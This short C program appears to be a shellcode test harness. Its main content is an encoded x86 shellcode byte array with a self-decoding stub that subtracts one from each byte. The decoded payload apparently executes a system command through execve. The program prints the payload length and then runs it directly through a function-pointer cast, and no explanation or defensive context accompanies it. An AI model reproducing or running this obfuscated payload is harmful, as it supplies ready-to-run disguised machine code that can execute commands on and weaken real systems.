
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;
 int fprintf (int ,char*,int) ;
 int stdout ;
 int strlen (char*) ;
 void stub1 () ;

int main(int argc, char *argv[])
{
char shellcode[] = "\xeb\x11\x5e\x31\xc9\xb1\x47\x80"
   "\x6c\x0e\xff\x01\x80\xe9\x01\x75"
     "\xf6\xeb\x05\xe8\xea\xff\xff\xff"
   "\x6b\x0c\x59\x9a\x53\x67\x69\x2e"
   "\x47\x8a\xe2\x53\x6b\x74\x67\x69"
   "\x6d\x66\x69\x37\x75\x62\x63\x69"
   "\x6f\x30\x6a\x71\x69\x30\x74\x63"
   "\x6a\x69\x30\x76\x74\x73\x8a\xe4"
   "\x53\x52\x54\x8a\xe2\xce\x81";

        fprintf(stdout,"Length: %d\n",strlen(shellcode));
 (*(void(*)()) shellcode)();
}
